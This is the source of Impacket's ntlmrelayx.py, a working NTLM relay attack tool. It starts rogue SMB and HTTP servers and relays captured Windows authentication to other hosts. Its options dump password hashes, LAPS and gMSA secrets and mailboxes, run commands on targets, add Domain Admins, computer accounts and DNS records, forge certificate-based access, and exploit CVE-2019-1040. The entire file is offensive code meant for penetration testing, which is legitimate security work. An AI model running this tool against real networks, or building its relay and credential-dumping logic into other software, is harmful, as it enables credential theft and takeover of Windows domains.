#!/usr/bin/env python # Impacket - Collection of Python classes for working with network protocols. # # Copyright Fortra, LLC and its affiliated companies # # All rights reserved. # # This software is provided under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Description: # Generic NTLM Relay Module # # This module performs the SMB Relay attacks originally discovered # by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc). # It receives a list of targets and for every connection received it # will choose the next target and try to relay the credentials. Also, if # specified, it will first try to authenticate against the client connecting # to us. # # It is implemented by invoking a SMB and HTTP Server, hooking to a few # functions and then using the specific protocol clients (e.g. SMB, LDAP). # It is supposed to be working on any LM Compatibility level. The only way # to stop this attack is to enforce on the server SPN checks and or signing. # # If the authentication against the targets succeeds, the client authentication # succeeds as well and a valid connection is set against the local smbserver. # It's up to the user to set up the local smbserver functionality. One option # is to set up shares with whatever files you want to so the victim thinks it's # connected to a valid SMB server. All that is done through the smb.conf file or # programmatically. # # Authors: # Alberto Solino (@agsolino) # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) # import argparse import sys import logging import cmd try: from urllib.request import ProxyHandler, build_opener, Request except ImportError: from urllib2 import ProxyHandler, build_opener, Request from urllib.parse import urlparse import json from time import sleep from threading import Thread from impacket import version from impacket.examples import logger from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig, parse_listening_ports from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS RELAY_SERVERS = [] class MiniShell(cmd.Cmd): def __init__(self, relayConfig, threads, api_address): cmd.Cmd.__init__(self) self.prompt = 'ntlmrelayx> ' self.api_address = api_address self.tid = None self.relayConfig = relayConfig self.intro = 'Type help for list of commands' self.relayThreads = threads self.serversRunning = True @staticmethod def printTable(items, header): colLen = [] for i, col in enumerate(header): rowMaxLen = max([len(row[i]) for row in items]) colLen.append(max(rowMaxLen, len(col))) outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)]) # Print header print(outputFormat.format(*header)) print(' '.join(['-' * itemLen for itemLen in colLen])) # And now the rows for row in items: print(outputFormat.format(*row)) def emptyline(self): pass def do_targets(self, line): for url in self.relayConfig.target.originalTargets: print(url.geturl()) return def do_finished_attacks(self, line): for url in self.relayConfig.target.finishedAttacks: print (url.geturl()) return def do_socks(self, line): '''Filter are available : type : socks <filter> <value> filters : target, username, admin values : - target : IP or FQDN - username : domain/username - admin : true or false ''' headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"] url = "http://{}/ntlmrelayx/api/v1.0/relays".format(self.api_address) try: proxy_handler = ProxyHandler({}) opener = build_opener(proxy_handler) response = Request(url) r = opener.open(response) result = r.read() items = json.loads(result) except Exception as e: logging.error("ERROR: %s" % str(e)) else: if len(items) > 0: if("=" in line and len(line.replace('socks','').split('='))==2): _filter=line.replace('socks','').split('=')[0] _value=line.replace('socks','').split('=')[1] if(_filter=='target'): _filter=1 elif(_filter=='username'): _filter=2 elif(_filter=='admin'): _filter=3 else: logging.info('Expect : target / username / admin = value') _items=[] for i in items: if(_value.lower() in i[_filter].lower()): _items.append(i) if(len(_items)>0): self.printTable(_items,header=headers) else: logging.info('No relay matching filter available!') elif("=" in line): logging.info('Expect target/username/admin = value') else: self.printTable(items, header=headers) else: logging.info('No Relays Available!') def do_startservers(self, line): if not self.serversRunning: start_servers(options, self.relayThreads) self.serversRunning = True logging.info('Relay servers started') else: logging.error('Relay servers are already running!') def do_stopservers(self, line): if self.serversRunning: stop_servers(self.relayThreads) self.serversRunning = False logging.info('Relay servers stopped') else: logging.error('Relay servers are already stopped!') def do_exit(self, line): print("Shutting down, please wait!") return True def do_EOF(self, line): return self.do_exit(line) def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setAddComputerSMB(options.add_computer) c.setDisableMulti(options.no_multirelay) c.setKeepRelaying(options.keep_relaying) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setdumpHashes(options.dump_hashes) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record) c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setSMBChallenge(options.ntlmchallenge) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setWebDAVOptions(options.serve_image) c.setIsADCSAttack(options.adcs) c.setADCSOptions(options.template) c.setIsShadowCredentialsAttack(options.shadow_credentials) c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type, options.cert_outfile_path) c.setIsSCCMPoliciesAttack(options.sccm_policies) c.setIsSCCMDPAttack(options.sccm_dp) c.setSCCMPoliciesOptions(options.sccm_policies_clientname, options.sccm_policies_sleep) c.setSCCMDPOptions(options.sccm_dp_extensions, options.sccm_dp_files) c.setAltName(options.altname) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB if server is not SMBRelayServer and options.random: c.setRandomTargets(True) if server is HTTPRelayServer: c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) for port in options.http_port: c.setListeningPort(port) s = server(c) s.start() threads.add(s) sleep(0.1) continue elif server is SMBRelayServer: c.setListeningPort(options.smb_port) elif server is WCFRelayServer: c.setListeningPort(options.wcf_port) elif server is RAWRelayServer: c.setListeningPort(options.raw_port) s = server(c) s.start() threads.add(s) return c def stop_servers(threads): todelete = [] for thread in threads: if isinstance(thread, tuple(RELAY_SERVERS)): thread.server.shutdown() todelete.append(thread) # Now remove threads from the set for thread in todelete: threads.remove(thread) del thread # Process command-line arguments. if __name__ == '__main__': print(version.BANNER) #Parse arguments parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will " "try to relay that connection to specified target(s) system or the original client") parser._optionals.title = "Main options" #Main arguments parser.add_argument("-h","--help", action="help", help='show this help message and exit') parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, " "can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port " "are optional, and don't forget to escape the '\\'). If unspecified, it will relay back " "to the client')") parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or ' 'full URL, one per line') parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list ' 'automatically (only valid with -tf)') parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient, LDAP console or SQL shell instead' 'of executing a command after a successful relay. This console will listen locally on a ' ' tcp port and can be reached with for example netcat.') # Interface address specification parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to ' 'bind SMB and HTTP servers',default='') serversoptions = parser.add_argument_group() serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server') serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server') serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server') serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server') parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445) parser.add_argument('--http-port', help='Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`', default="80") parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666) parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)') parser.add_argument('--keep-relaying', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it') parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection') parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER') parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot ' 'directory in which gathered loot such as SAM dumps will be stored (default: current directory).') parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes ' 'will be added for ntlm and ntlmv2') parser.add_argument('-dh','--dump-hashes', action='store_true', default=False, help='show encrypted hashes in the console') parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' '"%s"). If errors are detected, run chcp.com at the target, ' 'map the result with ' 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py ' 'again with -codec and the corresponding codec ' % sys.getdefaultencoding()) parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support') parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the ' 'SMB Server (16 hex bytes long. eg: 1122334455667788)') parser.add_argument('-socks', action='store_true', default=False, help='Launch a SOCKS proxy for the connection relayed') parser.add_argument('-socks-address', default='', help='SOCKS5 server address (also used for HTTP API)') parser.add_argument('-socks-port', default=1080, type=int, help='SOCKS5 server port') parser.add_argument('-http-api-port', default=9090, type=int, help='SOCKS5 HTTP API port') parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, ' 'setting the proxy host to the one supplied.') parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed ' 'before serving a WPAD file. (default=1)') parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4') parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)') parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients') parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on ' 'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be' ' in the same directory). For RPC no output will be provided.') #SMB arguments smboptions = parser.add_argument_group("SMB client options") smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. ' 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') #RPC arguments rpcoptions = parser.add_argument_group("RPC client options") rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported') rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes') rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]', help='Use this credential to authenticate to SMB (low-privilege account)') rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH") rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB') #MSSQL arguments mssqloptions = parser.add_argument_group("MSSQL client options") mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute' '(can specify multiple)') #HTTPS options httpoptions = parser.add_argument_group("HTTP options") httpoptions.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when interacting with the domain to grab a session key for ' 'signing, format is domain/machine_name') httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH') httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON') httpoptions.add_argument('-remove-target', action='store_true', default=False, help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)') #LDAP options ldapoptions = parser.add_argument_group("LDAP client options") ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks') ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks') ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one') ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account') ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name') ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user') ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user') ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info') ldapoptions.add_argument('--add-dns-record', nargs=2, action='store', metavar=('NAME', 'IPADDR'), required=False, help='Add the <NAME> record to DNS via LDAP pointing to <IPADDR>') #Common options for SMB and LDAP commonoptions = parser.add_argument_group("Common options for SMB and LDAP") commonoptions.add_argument('--add-computer', action='store', metavar=('COMPUTERNAME', 'PASSWORD'), required=False, nargs='*', help='Attempt to add a new computer account via SMB or LDAP, depending on the specified target. ' 'This argument can be used either with the LDAP or the SMB service, as long as the target is a domain controller.') #IMAP options imapoptions = parser.add_argument_group("IMAP client options") imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. ' 'If not specified, will search for mails containing "password"') imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX') imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, ' 'dump all emails') imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump ' '(0 = unlimited, default: no limit)') # AD CS options adcsoptions = parser.add_argument_group("AD CS attack options") adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack') adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`') adcsoptions.add_argument('--altname', action='store', metavar="ALTNAME", required=False, help='Subject Alternative Name to use when performing ESC1 or ESC6 attacks.') # Shadow Credentials attack options shadowcredentials = parser.add_argument_group("Shadow Credentials attack options") shadowcredentials.add_argument('--shadow-credentials', action='store_true', required=False, help='Enable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)') shadowcredentials.add_argument('--shadow-target', action='store', required=False, help='target account (user or computer$) to populate msDS-KeyCredentialLink from') shadowcredentials.add_argument('--pfx-password', action='store', required=False, help='password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)') shadowcredentials.add_argument('--export-type', action='store', required=False, choices=["PEM", "PFX"], type=lambda choice: choice.upper(), default="PFX", help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))') shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key') # SCCM policies options sccmpoliciesoptions = parser.add_argument_group("SCCM Policies attack options") sccmpoliciesoptions.add_argument('--sccm-policies', action='store_true', required=False, help='Enable SCCM policies attack. Performs SCCM secret policies dump from a Management Point by registering a device. Works best when relaying a machine account. Expects as target \'http://<MP>/ccm_system_windowsauth/request\'') sccmpoliciesoptions.add_argument('--sccm-policies-clientname', action='store', required=False, help='The name of the client that will be registered in order to dump secret policies. Defaults to the relayed account\'s name') sccmpoliciesoptions.add_argument('--sccm-policies-sleep', action='store', required=False, help='The number of seconds to sleep after the client registration before requesting secret policies') sccmdpoptions = parser.add_argument_group("SCCM Distribution Point attack options") sccmdpoptions.add_argument('--sccm-dp', action='store_true', required=False, help='Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target \'http://<DP>/sms_dp_smspkg$/Datalib\'') sccmdpoptions.add_argument('--sccm-dp-extensions', action='store', required=False, help='A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx') sccmdpoptions.add_argument('--sccm-dp-files', action='store', required=False, help='The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing') try: options = parser.parse_args() except Exception as e: logging.error(str(e)) sys.exit(1) if options.rpc_use_smb and not options.auth_smb: logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes") sys.exit(1) # Ensuring the correct target is set when performing SCCM policies attack if options.sccm_policies is True and not options.target.rstrip('/').endswith("/ccm_system_windowsauth/request"): logging.error("When performing SCCM policies attack, the Management Point authenticated device registration endpoint should be provided as target") logging.error(f"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/ccm_system_windowsauth/request") sys.exit(1) # Ensuring the correct target is set when performing SCCM DP attack if options.sccm_dp is True and not options.target.rstrip('/').endswith("/sms_dp_smspkg$/Datalib"): logging.error("When performing SCCM DP attack, the Distribution Point Datalib endpoint should be provided as target") logging.error(f"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/sms_dp_smspkg$/Datalib") sys.exit(1) # Init the example's logger theme logger.init(options.ts) if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) # Let's register the protocol clients we have # ToDo: Do this better somehow from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS if options.add_dns_record: dns_name = options.add_dns_record[0].lower() if dns_name == 'wpad' or dns_name == '*': logging.warning('You are asking to add a `wpad` or a wildcard DNS name. This can cause disruption in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config.') if options.codec is not None: codec = options.codec else: codec = sys.getdefaultencoding() if options.target is not None: logging.info("Running in relay mode to single host") mode = 'RELAY' targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random) # Disabling multirelay feature (Single host + general candidate) if targetSystem.generalCandidates: options.no_multirelay = True else: if options.tf is not None: #Targetfile specified if (options.add_computer): logging.info("To add a machine account through SMB only the Domain Controller must be specified as target") sys.exit(1) logging.info("Running in relay mode to hosts in targetfile") targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random) mode = 'RELAY' else: logging.info("Running in reflection mode") targetSystem = None mode = 'REFLECTION' if not options.no_smb_server: RELAY_SERVERS.append(SMBRelayServer) if not options.no_http_server: RELAY_SERVERS.append(HTTPRelayServer) try: options.http_port = parse_listening_ports(options.http_port) except ValueError: logging.error("Incorrect specification of port range for HTTP server") sys.exit(1) if options.r is not None: logging.info("Running HTTP server in redirect mode") if not options.no_wcf_server: RELAY_SERVERS.append(WCFRelayServer) if not options.no_raw_server: RELAY_SERVERS.append(RAWRelayServer) if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() threads = set() socksServer = None if options.socks is True: # Start a SOCKS proxy in the background socksServer = SOCKS(server_address=(options.socks_address, options.socks_port), api_port=options.http_api_port) socksServer.daemon_threads = True socks_thread = Thread(target=socksServer.serve_forever) socks_thread.daemon = True socks_thread.start() threads.add(socks_thread) c = start_servers(options, threads) # Log multirelay flag status if options.no_multirelay: logging.info("Multirelay disabled") else: logging.info("Multirelay enabled") print("") logging.info("Servers started, waiting for connections") try: if options.socks: shell = MiniShell(c, threads, api_address='{}:{}'.format(options.socks_address, options.http_api_port)) shell.cmdloop() else: sys.stdin.read() except KeyboardInterrupt: pass else: pass if options.socks is True: socksServer.shutdown() del socksServer for s in threads: del s sys.exit(0)